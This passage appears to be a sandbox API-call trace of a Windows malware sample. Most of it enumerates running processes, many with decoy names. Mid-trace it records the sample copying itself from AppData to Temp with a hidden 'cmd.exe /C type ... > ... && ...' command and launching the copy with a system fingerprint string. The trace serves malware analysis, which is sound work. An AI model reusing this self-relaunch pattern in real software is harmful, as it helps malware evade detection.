[0106.938] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.939] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.939] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.940] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.941] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.941] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.942] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.943] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.943] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.944] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.945] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.946] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.946] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.947] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.948] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.950] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.951] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.953] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.954] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.955] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.956] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.957] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.958] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.959] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.960] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.962] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.984] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.985] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.986] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.987] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.988] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.989] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.990] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.991] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.992] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.993] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.995] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.996] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.997] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.998] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.999] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.001] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.003] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.005] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.007] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0107.008] CloseHandle (hObject=0xf8) returned 1 [0107.009] GetTickCount () returned 0x25994 [0107.009] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16379780674) returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0107.009] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0107.009] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0107.009] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0107.009] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0107.009] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0107.009] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0107.009] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\F8A3IWA6.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\F8A3IWA6.EXE\" [PARAMS]") returned 0xb1 [0107.009] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0107.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf8, dwProcessId=0xc8c, dwThreadId=0xc90)) returned 1 [0107.015] CloseHandle (hObject=0xf0) returned 1 [0107.015] CloseHandle (hObject=0xf8) returned 1 [0107.015] Sleep (dwMilliseconds=0xfa) [0107.294] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf4 [0107.299] Process32FirstW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.299] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.300] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.302] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.303] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.303] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.304] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.305] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.305] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.306] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.307] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.307] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.308] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, 